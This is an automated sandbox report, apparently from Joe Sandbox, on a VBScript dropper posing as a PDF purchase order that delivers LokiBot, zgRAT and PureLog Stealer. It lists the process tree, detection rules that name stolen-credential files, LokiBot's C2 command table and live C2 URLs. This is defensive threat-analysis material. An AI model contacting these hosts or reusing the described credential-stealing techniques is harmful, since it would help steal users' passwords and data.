Edit tour

Windows Analysis Report
#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs

Overview

General Information

Sample name:	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs renamed because original name is a hash value
Original sample name:	-_(PO_460387320)_pdf.vbs
Analysis ID:	1421256
MD5:	055c0925042cb8d785f50c598449a755
SHA1:	b9a1ef638c9f8445ee5f8d9536a752e85f6264a5
SHA256:	262001fa47c949d07b1998343285eff24a6c5603f5d60946bee05728412bfe5a
Tags:	vbs
Infos:

Detection

Lokibot, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected Lokibot

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Potential malicious VBS script found (has network functionality)

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: AspNetCompiler Execution

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

x.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: F5259113B28AA9CB170D1D4C7003F79F)

aspnet_compiler.exe (PID: 1444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

aspnet_compiler.exe (PID: 4596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://altaskifer.sbs/PWS/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\x.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\x.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\x.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x11bff:$s1: file:/// 0x11b0d:$s2: {11111-22222-10009-11112} 0x11b8f:$s3: {11111-22222-50001-00000} 0x10300:$s4: get_Module 0xf8f0:$s5: Reverse 0xf604:$s6: BlockCopy 0xf87b:$s7: ReadByte 0x11c11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x93568:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8091b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x8f15f:$des3: 68 03 66 00 00 0x93568:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x93634:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17698:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4a63:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x132a7:$des3: 68 03 66 00 00 0x17698:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17764:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: x.exe PID: 7020	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: x.exe PID: 7020	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: x.exe PID: 7020	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x90237:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x168108:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 4596	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4596	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4596	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4596	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xa060:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.x.exe.70000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
2.0.x.exe.70000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.0.x.exe.70000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x11bff:$s1: file:/// 0x11b0d:$s2: {11111-22222-10009-11112} 0x11b8f:$s3: {11111-22222-50001-00000} 0x10300:$s4: get_Module 0xf8f0:$s5: Reverse 0xf604:$s6: BlockCopy 0xf87b:$s7: ReadByte 0x11c11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.wscript.exe.1a474030090.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.wscript.exe.1a474030090.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.wscript.exe.1a474030090.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x11bff:$s1: file:/// 0x11b0d:$s2: {11111-22222-10009-11112} 0x11b8f:$s3: {11111-22222-50001-00000} 0x10300:$s4: get_Module 0xf8f0:$s5: Reverse 0xf604:$s6: BlockCopy 0xf87b:$s7: ReadByte 0x11c11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.wscript.exe.1a474030090.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.wscript.exe.1a474030090.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.wscript.exe.1a474030090.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xfdff:$s1: file:/// 0xfd0d:$s2: {11111-22222-10009-11112} 0xfd8f:$s3: {11111-22222-50001-00000} 0xe500:$s4: get_Module 0xdaf0:$s5: Reverse 0xd804:$s6: BlockCopy 0xda7b:$s7: ReadByte 0xfe11:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
4.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.2.x.exe.338d2a8.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.x.exe.338d2a8.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.x.exe.338d2a8.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.x.exe.338d2a8.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
2.2.x.exe.338d2a8.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.x.exe.23954fc.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.x.exe.23954fc.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.x.exe.23954fc.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.x.exe.23954fc.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1f06c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.x.exe.23954fc.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xc41f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.x.exe.23954fc.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x1ba30:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x1bc78:$a2: last_compatible_version
2.2.x.exe.23954fc.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1ac63:$des3: 68 03 66 00 00 0x1f06c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1f138:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.x.exe.23954fc.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x1e1b2:$f1: FileZilla\recentservers.xml 0x1e1f2:$f2: FileZilla\sitemanager.xml 0x1c462:$b2: Mozilla\Firefox\Profiles 0x1c1cc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1c376:$s4: logins.json 0x1d220:$s6: wand.dat 0x1bca0:$a1: username_value 0x1bc90:$a2: password_value 0x1c2db:$a3: encryptedUsername 0x1c348:$a3: encryptedUsername 0x1c2ee:$a4: encryptedPassword 0x1c35c:$a4: encryptedPassword
4.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.x.exe.338d2a8.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.x.exe.338d2a8.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.x.exe.338d2a8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.x.exe.338d2a8.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.x.exe.338d2a8.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.x.exe.338d2a8.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.x.exe.338d2a8.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.x.exe.338d2a8.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", ProcessId: 5140, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7020, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1444, ProcessName: aspnet_compiler.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

